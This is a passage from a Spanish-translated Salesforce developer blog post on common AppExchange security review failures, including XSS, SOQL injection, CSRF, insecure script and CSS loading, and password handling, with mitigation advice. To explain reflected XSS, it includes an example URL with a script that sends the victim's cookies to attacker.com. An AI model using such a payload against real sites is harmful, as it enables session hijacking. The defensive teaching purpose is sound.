  • Otra técnica de mitigación implica agregar una página de confirmación intermedia antes de realizar la acción, donde el usuario puede confirmar que tenía la intención de realizar esa acción.

Para componentes Lightning:

  • De manera similar a las páginas de Visualforce, evite cambiar el estado o ejecutar acciones al cargar un componente Lightning, mediante enlaces como init (para Aura) ,connectedCallback , renderedCallback o constructor .

Al realizar llamadas API:

  • Para las API que no son de Salesforce, es posible que también desee agregar su propio token CSRF.

CSRF es uno de los tipos de problemas de seguridad más complicados, por lo que vale la pena invertir en aprender más sobre él en profundidad. Para los paquetes de Salesforce, existe excelente documentación para desarrolladores y un módulo Trailhead como referencia.

Para otros tipos de aplicaciones web, es posible que desees consultar la documentación de OWASP .

Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas en sus aplicaciones web externas.

N.º 8: secuencias de comandos entre sitios (XSS) almacenadas y reflejadas

¿Qué es esto?

Los ataques de secuencias de comandos entre sitios (XSS) son problemas de inyección en los que se insertan secuencias de comandos dañinas en sitios web confiables. Ocurren cuando un atacante explota una aplicación web para enviar código malicioso, a menudo un script del lado del cliente, a un usuario diferente. Estos ataques explotan fallas en aplicaciones web que utilizan entradas de usuario no validadas o codificadas en su salida.

En un ataque XSS, el navegador de un usuario desprevenido ejecuta el script malicioso, creyendo que proviene de una fuente confiable. Esto permite que el script acceda a cookies, tokens de sesión u otros datos confidenciales almacenados en el navegador. Incluso puede modificar el contenido HTML de la página.

Los ataques XSS almacenados son de tipo persistente, en los que la aplicación web almacena la entrada maliciosa y luego se muestra a los usuarios. Los ataques XSS reflejados, por otro lado, generalmente ocurren cuando se inyecta código malicioso en una URL, que se ejecuta cuando un usuario hace clic en ella (por ejemplo: http://example.com/search?query=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script> ).

Los motivos por los que su aplicación podría ser susceptible incluyen:

  • Entrada no validada : las aplicaciones pueden aceptar entradas del usuario y usarlas o mostrarlas en una página sin validarlas adecuadamente (para garantizar que no contenga código/scripts ejecutables).
  • Campos de texto enriquecido : almacenar entradas en campos RTF de Salesforce es riesgoso porque admiten contenido HTML, por lo que debe validar la entrada para evitar que se almacenen XSS.
  • Páginas de Visualforce : pueden ser susceptibles si utilizan entradas generadas por el usuario en el cuerpo HTML o en JavaScript sin un escape de entrada o codificación de salida adecuados.
  • Componentes web Aura y Lightning (LWC) : aunque tienen protecciones integradas contra XSS, los desarrolladores pueden evitar estas protecciones mediante cosas como el uso de la propiedad innerHTML , lwc:dom=”manual” o el componente lightning:formattedRichText sin la validación de entrada adecuada.
  • Parámetros de URL : las aplicaciones pueden usarlos directamente en el HTML o JavaScript de una página sin validación (lo que lleva a XSS reflejado).

¿Cómo puedo abordar esto?

Su objetivo principal debe ser evitar la manipulación de DOM, pero también recomendamos practicar el filtrado de entrada y la codificación de salida, que incluyen:

  • Evite la manipulación del modelo de objetos de documento (DOM): en su lugar, utilice técnicas como directivas de plantilla y evite funciones de JavaScript potencialmente inseguras (por ejemplo, eval() , DOMParser.parseFromString() , Document.implementation.createHTMLDocument() , setTimeout() , setInterval() )
  • Filtrado de entrada: asegúrese de que la entrada del usuario no contenga código ejecutable mediante el uso de expresiones regulares y listas de bloqueo o listas de permitidos (por ejemplo, filtre los caracteres comúnmente utilizados en el código, como '<', '>', comillas simples o dobles, ' /', ';', corchetes, paréntesis u operadores matemáticos o lógicos como '+', '&' o '-')
  • Codificación de salida : asegúrese de que si el código ejecutable pasara el filtrado de entrada, no se interprete como código al convertir caracteres "peligrosos" en versiones de texto inofensivas (por ejemplo, '&; debe convertirse a &amp; y '<' o '>' debe convertirse a &lt; y &gt;)

Este módulo de Trailhead explica exactamente cómo mitigar XSS con estas técnicas, y nuestra documentación para desarrolladores también es útil aquí. Para obtener consejos específicos sobre la protección contra XSS en componentes Lightning, consulte la página Seguridad Lightning en la Guía de codificación segura.

Para aplicaciones web que no son de Salesforce, también puede consultar la documentación de OWASP para obtener consejos adicionales.

Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas.

#9: JavaScript no está en recursos estáticos

¿Qué es esto?

Muchos paquetes administrados por Salesforce no pasan la revisión de seguridad por no almacenar JavaScript como recursos estáticos en sus paquetes y, en su lugar, se vinculan a archivos JavaScript alojados externamente con etiquetas <script> . La razón principal de esta regla es que permite un control de versiones mucho más seguro y garantiza la integridad de los archivos JavaScript en su paquete de Salesforce incluso si la fuente externa está comprometida.

¿Cómo puedo abordar esto?

Nuestra regla es que todos los recursos de script y estilo deben agregarse al paquete como recursos estáticos y luego cargarse con una etiqueta <apex:includeScript> en su página (para Visualforce) o un ltng:require en su .cmp o .app. marcado (para Aura).

Nota: Si tiene un LWC, defina los módulos JavaScript que importe a su componente o use la función loadScript para cargar un archivo JavaScript de recursos estáticos.

Para paquetes que no son LWC, la mejor manera de verificar este problema es buscar manualmente su código fuente para asegurarse de que todas las bibliotecas de JavaScript estén almacenadas como recursos estáticos, no cargadas dinámicamente a través de hipervínculos.

Para situaciones en las que esto no sea factible, recomendamos programar una cita en horario de oficina técnica para analizar su caso de uso. Es posible obtener una excepción en ciertos casos.

Obtenga más información sobre este problema en nuestra documentación para desarrolladores .

#10 – Inyección SOQL

¿Qué es esto?

La inyección SOQL es la versión específica de Salesforce de la inyección SQL. Ocurre cuando una entrada no validada proporcionada por el usuario se inserta directamente en una consulta SOQL dinámica. Si la entrada no está validada, puede incluir comandos SOQL que modifican efectivamente la declaración SOQL y engañan a la aplicación para que ejecute comandos no deseados.

¿Cómo puedo abordar esto?

La forma más sencilla de evitar el problema es evitar consultas dinámicas en favor de consultas estáticas y utilizar variables vinculantes. De lo contrario, deberá validar estrictamente las entradas del usuario antes de usarlas en consultas mediante técnicas como encasillamiento, lista blanca de entradas o escape.

Code Analyzer , PMD para VS Code y Checkmarx también pueden ayudarlo a escanear su código.

Para obtener más información, consulte nuestro módulo Trailhead o revise nuestra documentación para desarrolladores .

Para aplicaciones que no son de Salesforce, es posible que desee obtener más información sobre la inyección SQL en la guía OWASP . Los escáneres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , también pueden ayudar a identificar problemas de inyección SQL.

#11 — Lightning: carga CSS inadecuada

¿Qué es esto?

Similar al problema de usar etiquetas <script> o <link> para cargar JavaScript en sus paquetes, usar etiquetas <link> o <style> para cargar CSS en lugar de <apex:stylesheet> (Visualforce) o <ltng:require> ( Aura) se considera una práctica insegura. Estas etiquetas <link> y <style> pueden hacer referencia a recursos externos o en línea que contienen CSS o JavaScript, y la arquitectura de seguridad Lightning Web Security (LWS) de Salesforce no los controla ni los desinfecta.

Para los componentes de Aura, en particular, el uso de <ltng:require> también permite a Salesforce aplicar correctamente las reglas de seguridad LWS y garantizar que el CSS que está cargando esté correctamente aislado y no incluya código o estilos JavaScript no seguros que puedan afectar negativamente a otros. partes de su aplicación Salesforce.

¿Cómo puedo abordar esto?

Para hacer referencia a un recurso CSS externo que haya subido como recurso estático, use una etiqueta <apex:stylesheet> en su página (para Visualforce) o una etiqueta <ltng:require> en su marcado .cmp o .app (para Aura ). Busque el código fuente de su paquete para asegurarse de que no haya utilizado etiquetas <link> o <style> en ningún lugar para cargar recursos CSS.

Nota: Si tiene una LWC, no puede encontrarse con este problema de todos modos porque, al igual que las etiquetas <script> , las etiquetas <style> ya están bloqueadas para su uso dentro de las plantillas HTML. En su lugar, incluiría su CSS en el archivo CSS asociado de su componente o usaría la función loadStyle para cargar un archivo CSS de recursos estáticos.

Puede encontrar más información en nuestra documentación para desarrolladores .

#12: JavaScript en Salesforce DOM (solo experiencia clásica)

¿Qué es esto?

Salesforce tiene reglas estrictas sobre el uso de JavaScript y una de esas reglas es que JavaScript no se puede ejecutar directamente dentro del contexto de la aplicación Salesforce. Esto significa que no puede incluir bloques de JavaScript directamente dentro de los componentes que se ejecutan en Salesforce DOM, como HomePageComponents, WebLinks, Custom Buttons, etc.

En cambio, todo JavaScript debe residir bajo el dominio de espacio de nombres de su aplicación en las páginas de Visualforce que usted controla, de modo que el JavaScript personalizado esté esencialmente aislado del DOM principal de Salesforce. Eso significa que no puede usar JavaScript para crear botones personalizados, pestañas web, componentes de página de inicio y elementos similares (por ejemplo, incluir controladores de eventos de JavaScript onclick en botones personalizados podría ser motivo de falla).

¿Cómo puedo abordar esto?

Esto es algo que deberá verificar manualmente en el código fuente de su paquete Salesforce. Verifique y asegúrese de que no haya utilizado JavaScript para crear botones personalizados, pestañas web, componentes de la página de inicio u otros elementos similares, y verifique que cualquier JavaScript personalizado esté incluido solo en el dominio de su aplicación con espacio de nombres en las páginas de VisualForce que controla como parte de su aplicación.

Una forma de verificar esto es buscar el texto <openType>onClickJavaScript</openType> en los archivos de metadatos de la aplicación (a menudo en archivos XML como weblink/something.weblink) y, si lo encuentra, asegúrese de eliminarlo. Incluso si su aplicación solo está destinada a usarse en Lightning Experience, si la vulnerabilidad está presente para los usuarios en modo Clásico, el paquete no se puede aprobar.

Esta regla en particular no está especialmente bien documentada, pero puede leer más en el documento Lista de verificación de revisión de seguridad de AppExchange (se requiere iniciar sesión en la comunidad de socios).

#13 — Divulgación de información en páginas de error y excepciones

¿Qué es esto?

En el contexto de la revisión de seguridad de AppExchange, este término se refiere específicamente a situaciones (generalmente en aplicaciones o servicios web que no son de Salesforce o fuera de plataforma) donde sus páginas de error muestran datos confidenciales del sistema o información de depuración. Por ejemplo, a veces las páginas de error incluyen seguimientos de pila completos que muestran cómo se hace referencia internamente a los objetos o rutas de archivo relativas al lugar donde está instalada la aplicación. A veces, incluso la información confidencial queda expuesta de esta manera.

¿Cómo puedo abordar esto?

Busque en su base de código llamadas que causen excepciones o que los seguimientos de pila se representen en cadenas o flujos de salida, y realice pruebas que puedan causar errores, como entradas no válidas, entradas vacías, entradas demasiado largas, acceso a páginas internas sin autenticación, omisión de aplicaciones. flujo, etc

La herramienta de fuzzing de Burp Suite puede ser una gran ayuda en este caso.

También puede obtener excelentes consejos para realizar pruebas de seguimiento de pila a través de esta guía de OWASP .

#14 — Componentes de Aura: componente externo de CSS

¿Qué es esto?

Se supone que los componentes de Aura son pequeños, autónomos, reutilizables y reposicionables. CSS que evita la encapsulación de componentes (a través de .THIS) o que utiliza un posicionamiento no estándar (por ejemplo, flotante o posición: absoluta o fija) infringe estas garantías y puede interferir con la visualización de otros componentes. En particular, el uso del posicionamiento absoluto en CSS es la razón principal de este tipo de falla.

Si bien esto puede no parecer un problema de seguridad a primera vista, puede alterar el diseño del sitio web de Salesforce y viola el espíritu del modelo de seguridad de Lightning, donde los componentes están estrictamente aislados y se garantiza que permanecerán en su propio carril.

¿Cómo puedo abordar esto?

Este es otro problema que debes verificar manualmente. Básicamente, busque en el CSS de su componente Aura, especialmente para posicionamiento absoluto/fijo o ancho y alto fijos. También recomendamos revisar nuestra documentación para asegurarse de que está siguiendo todas las reglas CSS correctas.

#15 — Canal de mensajes expuesto

¿Qué es esto?

Este término se refiere específicamente a los casos en los que no ha configurado el indicador isExposed en Lightning Message Channel en falso. Dado que esto proporciona acceso a la API del Servicio de mensajes Lightning (LMS), que le permite publicar y suscribirse a mensajes en todo el DOM y entre Aura, Visualforce y Lightning Web Components, debe establecerse en falso a menos que sea realmente necesario.

¿Cómo puedo abordar esto?

Tiene dos opciones, según su caso de uso, que incluyen:

  1. Registre un ticket de soporte para solicitar que se habilite la eliminación de componentes administrados para su paquete u organización de Dev Hub y elimine el componente del paquete. Si no puede hacerlo (por ejemplo, si esto afectaría la funcionalidad de los suscriptores que dependen de canales de mensajes expuestos), puede dejar el componente en el paquete y simplemente no usarlo (asegúrese de mencionar esto específicamente en un mensaje falso). documento positivo sobre su presentación).
  2. Si tiene que utilizar un componente de canal LMS, asegúrese de tener isExposed=false . Esto debe hacerse creando un nuevo componente de canal LMS porque los componentes existentes con isExposed=true no pueden cambiar isExposed=false . Utilice únicamente el componente recién creado en el código.

Más información está disponible en la documentación .

#16 – Información confidencial en URL

¿Qué es esto?

Esto se refiere a una situación en la que se envía información confidencial de larga duración en URL (por ejemplo, un ID o secreto de cliente, o un nombre de usuario/contraseña). En realidad, esto puede llevar a que se filtren secretos a largo plazo de varias maneras posibles. Por ejemplo:

  • Las URL completas a menudo se almacenan en servidores en registros de texto sin cifrar que pueden no almacenarse de forma segura y pueden ser vistos por el personal o comprometidos por un tercero.
  • Los motores de búsqueda indexan URL y almacenan inadvertidamente información confidencial
  • Almacenamiento de rutas URL completas en el historial del navegador local, caché del navegador, marcadores y marcadores sincronizados entre dispositivos
  • Información de URL enviada a aplicaciones web de terceros a través del encabezado de referencia o expuesta a scripts de terceros en la página

¿Cómo puedo abordar esto?

Burp Suite puede ayudarle aquí para aplicaciones web que no sean de Salesforce o fuera de plataforma, pero en general recomendamos comprobar manualmente su aplicación para detectar cualquier caso en el que se envíen secretos a largo plazo a través de URL. Dependiendo de su caso de uso, es posible que deba realizar cambios, como usar solicitudes POST en lugar de solicitudes GET, cambiar su método de autenticación (OAuth 2.0 es generalmente ideal) y emplear cifrado y mejores métodos de almacenamiento de secretos.

La guía OWASP es un gran recurso a seguir.

#17 – Punto final inseguro

¿Qué es esto?

El nombre de esta vulnerabilidad simplemente se refiere a situaciones en las que se utiliza HTTP en lugar de HTTPS.

¿Cómo puedo abordar esto?

Las herramientas de escaneo pueden ser de ayuda, pero una forma aún más segura de verificar esto es buscar en el código fuente enlaces HTTP y cambiarlos a HTTPS. Puede aprender un poco más sobre cómo esto mejora la seguridad en esta página de OWASP .

#18 — Enumeración de nombre de usuario o correo electrónico

¿Qué es esto?

Por lo general, este problema solo surge en aplicaciones web externas fuera de la plataforma Salesforce. Se refiere a una situación en la que los atacantes pueden enumerar listas de nombres de usuario o correos electrónicos de su base de usuarios, generalmente analizando cambios en mensajes de error en funciones de inicio de sesión, funciones de olvido de contraseña o registros de cuentas. Los atacantes suelen hacer esto para poder comprobar si hay contraseñas reutilizadas de bases de datos comprometidas y fugas o volcados de contraseñas.

¿Cómo puedo abordar esto?

Verifique sus mensajes de error para registros de cuentas, recuperación de contraseñas, intentos de inicio de sesión, etc., y asegúrese de que su mensaje de error sea el mismo independientemente de si el nombre de usuario o el correo electrónico ingresado es válido.

Por ejemplo, muchos sitios incluyen un mensaje genérico, como: "Si dicho usuario existe, recibirá un correo electrónico con un restablecimiento de contraseña". Este tipo de mensaje general evita confirmar la existencia de un nombre de usuario o correo electrónico.

Por supuesto, en determinadas situaciones, puede ser inevitable (por ejemplo, durante el registro de una cuenta, es posible que deba confirmar que se ha utilizado un nombre de usuario). En esas situaciones, intente implementar controles que impidan la enumeración por fuerza bruta, como captchas para evitar que los robots eliminen su formulario de registro.

Burp Suite es una excelente herramienta para verificar esto, pero si no la tiene, también puede revisar sus funcionalidades de inicio de sesión manualmente.

OWASP tiene una guía útil para evitar la enumeración de correos electrónicos y nombres de usuarios.

#19 — Gestión de contraseñas

¿Qué es esto?

En ocasiones, el equipo de seguridad falla en sitios y aplicaciones web externos (que no sean Salesforce) por tener políticas de contraseñas problemáticas, como por ejemplo:

  • Permitir la reutilización de la misma contraseña cuando es necesario restablecerla
  • No solicitar la contraseña anterior cuando se permite a los usuarios establecer una nueva contraseña
  • Para restablecer la contraseña, enviar una contraseña temporal al correo electrónico de un usuario en texto sin formato
  • Dejar contraseñas predeterminadas en los usuarios raíz del servidor o de la base de datos

¿Cómo puedo abordar esto?

Además de evitar las situaciones anteriores, consulte la Hoja de referencia de autenticación de OWASP para obtener algunas pautas sobre cómo establecer políticas de contraseñas seguras:

Burp Suite también es muy útil para identificar problemas relacionados con las contraseñas (por ejemplo, puede usarlo para intentar forzar sus páginas de inicio de sesión).

#20 – Eco de contraseña

¿Qué es esto?

Esto es un poco diferente del problema de administración de contraseñas descrito anteriormente. Un eco de contraseña se refiere a situaciones en las que las contraseñas se reflejan en texto sin formato en la interfaz de usuario (como cuando el usuario visita su propia página de configuración) o en llamadas API/respuestas JSON.

¿Cómo puedo abordar esto?

Asegúrese de que su contraseña no se revele ni se transmita en texto sin formato en ninguna parte de su aplicación. Asegúrese de que en las páginas de configuración u otras páginas que muestran secretos, se muestren solo como asteriscos (se pueden mostrar al hacer clic en el botón si es necesario).

Consulte la hoja de referencia sobre almacenamiento de contraseñas de OWASP para obtener más información.

Burp Suite , o quizás Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas.

Recursos adicionales

Si su solución incluye sitios web o aplicaciones web personalizados que no son de Salesforce, le recomendamos encarecidamente invertir en una licencia de Burp Suite si es financieramente viable para su organización. Burp Suite es una de las mejores herramientas de seguridad del mercado y también la utiliza mucho nuestro propio equipo de seguridad de productos. Chimera u OWASP ZAP son alternativas completamente gratuitas, pero prepárate para invertir más tiempo en términos de revisión manual, ya que carecen de muchas de las potentes funciones/herramientas que tiene Burp Suite.

Nota: Si su oferta se integra con aplicaciones o servicios web que no son de su propiedad, no intente escanear los puntos finales hasta que haya obtenido el permiso del propietario.

Salesforce Product Security también utiliza Code Analyzer , PMD para VS Code y Checkmarx para revisar el código fuente del paquete Salesforce. También utilizan la base de datos CVE y el escáner Qualys SSL en la mayoría de los envíos.

Si tiene problemas de seguridad y necesita orientación técnica, los socios ISV pueden registrarse para obtener horas de oficina gratuitas con nuestros ingenieros de seguridad a través del Portal de seguridad para socios .

Por último, no podemos recomendar lo suficiente Trailhead en términos de preparación para revisiones de seguridad. Vale la pena dedicar tiempo a la ruta Desarrollar aplicaciones web seguras y también acabamos de renovar el módulo Revisión de seguridad de AppExchange , que analiza el proceso de envío de un extremo a otro.

Sobre el Autor

Anika Teppo es evangelista técnica en Salesforce. Ha estado trabajando con el equipo de revisión de seguridad de AppExchange en Salesforce desde 2017, y su función actual consiste en hacer que Salesforce Labs y las soluciones internas se revisen y publiquen en AppExchange.

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

Añadir a holgura Suscríbete a RSS

Seguir leyendo